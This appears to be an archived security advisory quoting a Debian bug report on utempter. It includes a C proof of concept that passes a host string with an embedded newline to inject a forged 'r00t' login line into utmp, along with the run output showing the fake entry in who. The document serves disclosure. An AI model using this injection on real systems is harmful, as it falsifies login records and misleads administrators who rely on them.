Utempter Fake Entry Manipulation

`Quoting from   
http://bugs.debian.org/689562  
  
Utempter does not (cannot?) verify the setting of host, so it can easily  
be faked. This may affect any software that depend on utmp correctness.  
  
Demo of the issue:  
  
psz@bari:~$ cat silly.c  
#include <sys/types.h>  
#include <sys/stat.h>  
#include <fcntl.h>  
#include <unistd.h>  
#include <stdio.h>  
int main()  
{  
int i;  
i = open("/dev/ptmx", O_RDWR);  
printf("open ptmx returned %d\n", i);  
dup2(i, 0);  
/* dup2(i, 1); */  
printf("doing utempter add\n");  
system("/usr/lib/utempter/utempter add 'xyz)\nr00t pts/0 Jan 1 01:02 (xyz.com'");  
printf("checking who\n");  
system("who | grep xyz");  
printf("doing utempter del\n");  
system("/usr/lib/utempter/utempter del");  
printf("checking who\n");  
system("who | grep xyz");  
printf("DONE\n");  
}  
psz@bari:~$ cc silly.c; a.out  
open ptmx returned 3  
doing utempter add  
checking who  
psz pts/29 Oct 4 11:48 (xyz)  
r00t pts/0 Jan 1 01:02 (xyz.com)  
doing utempter del  
checking who  
DONE  
psz@bari:~$   
  
Please see also:  
http://bugs.debian.org/329156  
http://bugs.debian.org/330907  
  
Cheers, Paul  
  
Paul Szabo [email protected] http://www.maths.usyd.edu.au/u/psz/  
School of Mathematics and Statistics University of Sydney Australia  
  
  
`